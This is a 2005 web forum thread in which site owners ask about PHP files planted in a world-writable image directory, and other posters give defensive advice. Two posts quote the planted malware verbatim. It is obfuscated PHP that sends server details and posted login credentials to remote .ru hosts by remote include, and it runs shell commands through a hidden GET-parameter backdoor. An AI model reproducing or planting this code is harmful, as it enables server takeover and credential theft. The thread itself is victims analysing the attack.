PHP Webserver Attack (What is this?)

sexydawg · #1 11-05-2005, 01:52 PM

Our webserver is under attack... it came from several different IPs.. they uploaded several randomly named PHP files to an image directly that was CHMODed 777 with names like report.php, date.php, etc. This is the content of the files:

PHP Code:


			
<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : $HTTP_USER_AGENT);$h=(isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : $REMOTE_ADDR);$str=base64_encode($a).'.'.base64_encode($b).'.'.base64_encode($c).'.'.base64_encode($d).'.'.base64_encode($e).'.'.base64_encode($f).'.'.base64_encode($g).'.'.base64_encode($h); if ((include(base64_decode('aHR0cDovLw==').base64_decode('dXNlcjkubXNodG1sLnJ1')."/?".$str))){} else {include(base64_decode('aHR0cDovLw==').base64_decode('dXNlcjcuaHRtbHRhZ3MucnU=')."/?".$str);} ?>

Then I get a ton of URL requests from several IPs with questionable file names appended to the end:

/doom3.&.iso.htm
/uploader.briana.banks.html

etc., etc., etc.

What type of attack is this and what is the best way to stop it? Thanks...

**chazzy** · #2 11-05-2005, 02:38 PM

sounds like you have an anonymous ftp account or an account that someone got into and started playing around.

bokeh · #3 11-05-2005, 03:10 PM

Quote:

Originally Posted by sexydawg

they uploaded several randomly named PHP files to an image directly that was CHMODed 777

How were these uploaded? Do you have a file upload script on your site? If so post the script.

NogDog · #4 11-05-2005, 03:35 PM

It attempts to include a file from http://user9.mshtml.ru/, and if that fails then one from http://user7.htmltags.ru/. It appends a bunch of stuff about your server to the URL. What it does with that info, I do not know, as I don't have access to those files.

I would contact your web host provider to see if they can/want to take any action, and in the mean time make sure you change all your passwords (using high security types with upper and lower case plus numbers and underscores/hyphens) and making sure anonymous FTP is disabled.

**LiLcRaZyFuZzY** · #5 11-05-2005, 03:40 PM

yep, and change passwords once in a while

ShrineDesigns · #6 11-05-2005, 05:04 PM

it looks to me, someone is using your account to distribute warez

if it was a client-side hacking, you should REALLY consider improving security and validation in your scripts

3Pinter · #7 11-05-2005, 05:16 PM

And if you do have an upload-script ... check if it has a limited upload possibility. Some uploadscripts allow for example all kind of files. so some 'bad' people can upload a .php file or a .html which the can 'execute' and retrieve information.

Good luck

3Pinter

sexydawg · #8 11-05-2005, 08:07 PM

I have an upload script (limited to JPEGs only) but it is in an administration area that is guarded by apache authentication and as far as I can tell nobody has been in there. This was a pretty much instantaneous attack (I know who did it and what provoked it). Is it possible to upload to a CHMOD 777 directory without a script? Also, these were the only files uploaded.. the URLs I included do not exist... those scripts pick them up and redirect to that base64 encoded page.

bokeh · #9 11-05-2005, 08:14 PM

I don't really understand. If you have the IPs of the offender you must also know which of your scripts was used for the upload or include.

ShrineDesigns · #10 11-06-2005, 02:35 AM

if the directory is chmod 777, they can use ftp anonymously to upload/download files

TheWraith · #11 11-27-2005, 09:18 PM

I'm curious, do you have Mambo installed on your server? I've had this same hack on two of my shared hosting plans, all sites have a slightly outdated version of Mambo. I've even seen some Mambo components installed such as "com_moschat", that I haven't installed. I've had the same strange .php files created, referencing the same domains. I'm wondering if it has something to do with a Mambo exploit.

shagymoe · #12 11-28-2005, 03:03 PM

This happened to my site and a client site. Man, I wish there was something that could be done about this!!!!!!!! These Fukcers need to be stopped.

shagymoe · #13 11-28-2005, 03:10 PM

Here is some of the code....I'm hoping this gets out to the search engines.

<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>

Another file has this code:

<? error_reporting(0);$s="k";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($ d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>

**bathurst_guy** · #14 11-29-2005, 07:21 AM

its not good what ever they are doing - first off its from somewhere in russia - so thats immediately bad. the other is that they are trying to execute command line `uname -a` which outputs a single line with the name of the machine and the operating system version. They are doing their homework before they attack. I would check your processing powers and see if it has sky rocketed, they may have anything on the server now.... if so its time for a rebuild
why do you have a 777 dir anyway...

shagymoe · #15 12-06-2005, 11:06 AM

Is it not commonplace to 777 image directories?

Thread Tools	Search this Thread
Show Printable Version Email this Page	Search this Thread: Advanced Search
Display Modes	Rate This Thread
Switch to Linear Mode Hybrid Mode Switch to Threaded Mode	Rate This Thread:

Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)